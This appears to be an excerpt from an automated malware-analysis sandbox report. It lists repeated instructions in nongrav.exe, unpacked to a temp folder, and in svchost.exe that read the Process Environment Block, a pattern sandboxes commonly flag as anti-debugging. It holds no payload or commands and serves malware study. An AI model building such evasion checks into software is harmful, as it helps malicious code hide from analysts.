Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov ecx, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98CD6 mov eax, dword ptr fs:[00000030h] 15_2_1EB98CD6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFBC2C mov eax, dword ptr fs:[00000030h] 15_2_1EAFBC2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h] 15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h] 15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE746D mov eax, dword ptr fs:[00000030h] 15_2_1EAE746D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB82073 mov eax, dword ptr fs:[00000030h] 15_2_1EB82073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB91074 mov eax, dword ptr fs:[00000030h] 15_2_1EB91074
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA44B mov eax, dword ptr fs:[00000030h] 15_2_1EAFA44B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h] 15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h] 15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h] 15_2_1EAE0050
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h] 15_2_1EAE0050
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF35A1 mov eax, dword ptr fs:[00000030h] 15_2_1EAF35A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB469A6 mov eax, dword ptr fs:[00000030h] 15_2_1EB469A6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h] 15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h] 15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA185 mov eax, dword ptr fs:[00000030h] 15_2_1EAFA185
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC182 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC182
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h] 15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h] 15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2990 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2990
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB78DF1 mov eax, dword ptr fs:[00000030h] 15_2_1EB78DF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h] 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h] 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB541E8 mov eax, dword ptr fs:[00000030h] 15_2_1EB541E8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov ecx, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8E539 mov eax, dword ptr fs:[00000030h] 15_2_1EB8E539
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB4A537 mov eax, dword ptr fs:[00000030h] 15_2_1EB4A537
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98D34 mov eax, dword ptr fs:[00000030h] 15_2_1EB98D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov ecx, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h] 15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h] 15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAD30 mov eax, dword ptr fs:[00000030h] 15_2_1EACAD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC962 mov eax, dword ptr fs:[00000030h] 15_2_1EACC962
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h] 15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h] 15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h] 15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h] 15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB03D43 mov eax, dword ptr fs:[00000030h] 15_2_1EB03D43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43540 mov eax, dword ptr fs:[00000030h] 15_2_1EB43540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE7D50 mov eax, dword ptr fs:[00000030h] 15_2_1EAE7D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF5BA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF5BA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE138A mov eax, dword ptr fs:[00000030h] 22_2_03AE138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h] 22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h] 22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADD380 mov ecx, dword ptr fs:[00000030h] 22_2_03ADD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5B390 mov eax, dword ptr fs:[00000030h] 22_2_03A5B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h] 22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h] 22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5E730 mov eax, dword ptr fs:[00000030h] 22_2_03A5E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h] 22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h] 22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE131B mov eax, dword ptr fs:[00000030h] 22_2_03AE131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h] 22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h] 22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2DB60 mov ecx, dword ptr fs:[00000030h] 22_2_03A2DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3FF60 mov eax, dword ptr fs:[00000030h] 22_2_03A3FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8F6A mov eax, dword ptr fs:[00000030h] 22_2_03AF8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h] 22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h] 22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2DB40 mov eax, dword ptr fs:[00000030h] 22_2_03A2DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3EF40 mov eax, dword ptr fs:[00000030h] 22_2_03A3EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8B58 mov eax, dword ptr fs:[00000030h] 22_2_03AF8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2F358 mov eax, dword ptr fs:[00000030h] 22_2_03A2F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA46A7 mov eax, dword ptr fs:[00000030h] 22_2_03AA46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FAB0 mov eax, dword ptr fs:[00000030h] 22_2_03A5FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFE87 mov eax, dword ptr fs:[00000030h] 22_2_03ABFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h] 22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h] 22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A376E2 mov eax, dword ptr fs:[00000030h] 22_2_03A376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A516E0 mov ecx, dword ptr fs:[00000030h] 22_2_03A516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A68EC7 mov eax, dword ptr fs:[00000030h] 22_2_03A68EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A536CC mov eax, dword ptr fs:[00000030h] 22_2_03A536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADFEC0 mov eax, dword ptr fs:[00000030h] 22_2_03ADFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8ED6 mov eax, dword ptr fs:[00000030h] 22_2_03AF8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2E620 mov eax, dword ptr fs:[00000030h] 22_2_03A2E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADFE3F mov eax, dword ptr fs:[00000030h] 22_2_03ADFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
